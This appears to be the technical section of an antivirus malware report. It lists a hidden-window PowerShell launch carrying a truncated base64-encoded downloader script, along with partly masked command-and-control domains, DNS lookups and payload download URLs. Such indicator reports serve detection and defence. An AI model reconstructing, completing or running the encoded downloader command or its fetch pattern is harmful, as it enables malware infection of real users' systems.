Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAF8AMAAxADUAOAA9ACgAJwBJACcAKwAnADcAJwArACcAXwBfADUANAAnACkAOwAkAFcAMQAxADQANgAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEsAMABfADUAXwBfAF8AXwA9ACgAJwBoAH...
- 'ta####kun.m78.com':80
- 't-###yama.com':443
- 'fo####mafound.org':80
- 'i3###gram.org':80
- 'i3###gram.org':443
- 'ba#####demitos.com.br':80
- 'fa###ook.com':443
- http://ta####kun.m78.com/wp/wp-content/uploads/6IuU/
- http://www.i3###gram.org/wp-content/hJ8/
- http://ba#####demitos.com.br/Producao/IcnW/
- 't-###yama.com':443
- 'i3###gram.org':443
- 'fa###ook.com':443
- DNS ASK ta####kun.m78.com
- DNS ASK t-###yama.com
- DNS ASK fo####mafound.org
- DNS ASK i3###gram.org
- DNS ASK an####ehrabbani.com
- DNS ASK ba#####demitos.com.br
- DNS ASK fa###ook.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAF8AMAAxADUAOAA9ACgAJwBJACcAKwAnADcAJwArACcAXwBfADUANAAnACkAOwAkAFcAMQAxADQANgAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEsAMABfADUAXwBfAF8AXwA9ACgAJwBoAH...' (со скрытым окном)